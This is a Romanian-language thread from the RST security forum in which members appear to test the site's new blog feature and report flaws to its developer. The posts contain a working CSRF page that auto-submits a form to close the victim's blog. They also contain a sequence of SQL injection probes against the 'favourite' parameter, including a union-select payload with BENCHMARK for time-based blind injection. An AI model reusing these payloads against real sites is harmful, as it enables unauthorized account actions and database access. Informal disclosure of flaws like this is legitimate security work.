Jump to content
kw3rln

RST BLOG!

By kw3rln, in Off-topic

Recommended Posts

moubik Newbie

moubik

Posted
Posted

CSRF pentru auto-stergere blog:


<script>
	setTimeout("document.getElementById('rstCSRF').submit();", 100);
</script>



<form action="http://rstcenter.com/index.php?pagina=blog&cmd=myblog" id="rstCSRF" method="post">
	<input type="hidden" value="closeblog2" name="action"/>
	<input type="submit" value="Confirm Close Blog"/>
</form>

loki Newbie

loki

Posted
Posted
CSRF pentru auto-stergere blog:


<script>
	setTimeout("document.getElementById('rstCSRF').submit();", 100);
</script>



<form action="http://rstcenter.com/index.php?pagina=blog&cmd=myblog" id="rstCSRF" method="post">
	<input type="hidden" value="closeblog2" name="action"/>
	<input type="submit" value="Confirm Close Blog"/>
</form>

lol tu dai idei? :D:D

moubik Newbie

moubik

Posted
Posted

cum e in teste, e full disclosure de fapt :)

kw3, verifica variabila "favourite" legata de sql injection

da niste rezultate ciudate, nu-mi dau seama ce se intampla de fapt acolo :)

de dragul obisnuintei: (:))


[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 or 1=1

asta nu face nici un echo la al doilea request:


[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 and 1=1

asta spune ca nu exista blogul:


[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 and 1=2

edit:

spune ca nu exista blogul


[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 order by 7 --

nu spune nimic iarasi:


[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=144832 order by 6 --

edit edit edit:

uite si blind sql injection:


[url]http://rstcenter.com/index.php[/url]
?pagina=blog
&cmd=favourites
&operation=add
&favourite=1448329 union all select 1,2,3,4,5, BENCHMARK(10000000,MD5(CHAR(97))) --

loki Newbie

loki

Posted
Posted

Nu stiu daca ajuta cu ceva, observ ca daca entry=19" cu ceva in coada adica, nu gaseste blogul cand postez comment, asta inseamna ca nu prea e verificata entry daca e strict numerica. Da abia acu ma uit in cod sa ma bucur si eu :)

darkyndy Newbie

darkyndy

Posted
Posted

M-am jucat putin ... am adaugat 3 bloguri la favorite.

Cand dai pe add to favorite si totul e ok, ar trebui sa spuna "Blog adaugat", iar daca nu este ok requestul sa se spuna ca blogul nu a putut fi adaugat la favorite.

M-am dus apoi la favorite ... si e gol si nu mai apare nici meniul specific blogului.

Daca in comment dai new line cand esti pe view comment new line nu apar. Sfat: dupa ce scoate-ti continutul din tabela adaugati


eu foloseam fct nl2br()

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...